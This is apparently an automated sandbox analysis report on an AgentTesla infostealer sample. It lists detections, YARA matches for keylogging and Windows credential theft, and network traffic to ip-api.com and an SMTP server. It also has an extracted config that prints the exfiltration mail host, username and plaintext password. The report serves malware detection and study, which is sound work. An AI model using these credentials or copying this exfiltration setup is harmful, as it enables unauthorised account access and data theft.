Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "us2.smtp.mailhostbox.com", "Username": "laju.varghese@grupocatqla.com", "Password": ")Ivlmuj5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\lnYkIr.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

ReversingLabs: Detection: 28%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\lnYkIr.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack	String decryptor: u2R6%?_S
Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack	String decryptor: $%5'$:
Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack	String decryptor: `R cvJW&H(D(WAG
Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack	String decryptor: cSXU]QyT~SXU]LyTcSEU]QyIcSXU]QyTcSXU
Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack	String decryptor: 0=1 ?"6
Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack	String decryptor: vFCY,)-
Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack	String decryptor: uZ_C)
Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack	String decryptor: rUB]TYSE

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: sKdvLcn.pdb source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, lnYkIr.exe.0.dr
Source:	Binary string: sKdvLcn.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, lnYkIr.exe.0.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 4x nop then jmp 0B7F01F1h		0_2_0B7F0422
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 4x nop then jmp 0768EF19h		10_2_0768F14A

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.5:49729 -> 208.91.198.143:587

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.91.198.143 208.91.198.143
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

TCP traffic: 192.168.2.5:49729 -> 208.91.198.143:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.0000000001390000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.usertr
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingCi
Source: lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingyi;
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.0000000001390000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0A
Source: lnYkIr.exe, 0000000E.00000002.3379016292.0000000006706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.usertru
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2145030822.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.0000000003231000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2186008382.0000000003228000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366187385.000000000142D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3378982161.0000000006CF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3368803671.000000000328D000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3368762224.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3367006333.0000000000F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, J4qms1IPBw.cs

.Net Code: _4SbXE

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 14.2.lnYkIr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

.NET source code contains very large array initializations

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.2df41e8.5.raw.unpack, Architectural.cs

Large array initialization: : array initializer size 17982

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_052B79E8	0_2_052B79E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_052B03A8	0_2_052B03A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_052B0D68	0_2_052B0D68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_052B0D59	0_2_052B0D59
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_052B79D8	0_2_052B79D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_070E9798	0_2_070E9798
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_070EB6D2	0_2_070EB6D2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_070EB6E0	0_2_070EB6E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_070EA440	0_2_070EA440
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_070EA008	0_2_070EA008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_070E0C99	0_2_070E0C99
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_070E0CA8	0_2_070E0CA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_070E9BC2	0_2_070E9BC2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_070E9BD0	0_2_070E9BD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_0B7F0040	0_2_0B7F0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_0B7F0040	0_2_0B7F0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 0_2_0B7F0007	0_2_0B7F0007
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_030DC7B0	9_2_030DC7B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_030D4AC0	9_2_030D4AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_030DD0E7	9_2_030DD0E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_030D3EA8	9_2_030D3EA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_030D41F0	9_2_030D41F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_06FDDE10	9_2_06FDDE10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Code function: 9_2_06FD5980	9_2_06FD5980
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_01764B39	10_2_01764B39
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0768ED68	10_2_0768ED68
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_07689798	10_2_07689798
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0768B6E0	10_2_0768B6E0
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0768B6D3	10_2_0768B6D3
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0768A440	10_2_0768A440
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0768A008	10_2_0768A008
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0768ED59	10_2_0768ED59
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_07680CA8	10_2_07680CA8
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_07680C99	10_2_07680C99
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_07689BC3	10_2_07689BC3
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_07689BD0	10_2_07689BD0
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 10_2_0768ED68	10_2_0768ED68
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_01334AC0	14_2_01334AC0
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_0133D0E7	14_2_0133D0E7
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_01333EA8	14_2_01333EA8
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_013341F0	14_2_013341F0
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_069FDE10	14_2_069FDE10
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Code function: 14_2_069F5980	14_2_069F5980

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2148269661.0000000007130000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2145030822.0000000002E18000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename3e301610-77d9-4d01-8699-0e498c12f7fa.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000000.2100144872.000000000098C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesKdvLcn.exe" vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2142658019.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename3e301610-77d9-4d01-8699-0e498c12f7fa.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000009.00000002.3366131390.0000000001358000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Binary or memory string: OriginalFilenamesKdvLcn.exe" vs SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
